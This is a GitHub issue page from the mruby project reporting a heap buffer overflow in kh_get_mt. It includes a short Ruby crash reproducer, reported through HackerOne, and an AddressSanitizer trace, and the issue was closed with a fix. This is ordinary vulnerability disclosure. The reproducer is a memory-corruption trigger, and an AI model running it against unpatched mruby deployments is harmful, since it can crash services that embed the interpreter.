New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Heap buffer overflow in kh_get_mt #3717

Closed
clayton-shopify opened this Issue Jun 19, 2017 · 0 comments

Comments

Projects
None yet
1 participant
@clayton-shopify
Contributor

clayton-shopify commented Jun 19, 2017

The following input demonstrates a crash:

b = Array({:a => "a", :b => "b"})

def aa(n)
if n >= 0
instance_exec(x)
end
rescue
aa (n-1)
end

x =  GC.interval_ratio= 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
2.times{x.to_s}
b.inspect
aa(142)
y = Class.new.dup  {}
2.times{y.to_s}

It appears this issue was introduced by a893877.

ASAN report:

==67812==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000010090 at pc 0x00010e5603bd bp 0x7fff516b9bc0 sp 0x7fff516b9bb8
READ of size 4 at 0x604000010090 thread T0
    #0 0x10e5603bc in kh_get_mt (mruby:x86_64+0x1000243bc)
    #1 0x10e5785d1 in mrb_method_search_vm (mruby:x86_64+0x10003c5d1)
    #2 0x10e6a9a64 in mrb_vm_exec (mruby:x86_64+0x10016da64)
    #3 0x10e69f654 in mrb_vm_run (mruby:x86_64+0x100163654)
    #4 0x10e6d50ff in mrb_top_run (mruby:x86_64+0x1001990ff)
    #5 0x10e7ad26d in mrb_load_exec (mruby:x86_64+0x10027126d)
    #6 0x10e7ae085 in mrb_load_file_cxt (mruby:x86_64+0x100272085)
    #7 0x10e53e3a3 in main mruby.c:227
    #8 0x7fffe5638234 in start (libdyld.dylib:x86_64+0x5234)

Address 0x604000010090 is a wild pointer.
SUMMARY: AddressSanitizer: heap-buffer-overflow (mruby:x86_64+0x1000243bc) in kh_get_mt
Shadow bytes around the buggy address:
  0x1c0800001fc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c0800001fd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c0800001fe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c0800001ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c0800002000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x1c0800002010: fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c0800002020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c0800002030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c0800002040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c0800002050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x1c0800002060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==67812==ABORTING
Abort trap: 6

This issue was reported by https://hackerone.com/ahihi

@matz matz closed this in c41e262 Jun 21, 2017

@matz matz referenced this issue Jul 4, 2017

Closed

1.3.0 Changes #3140

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment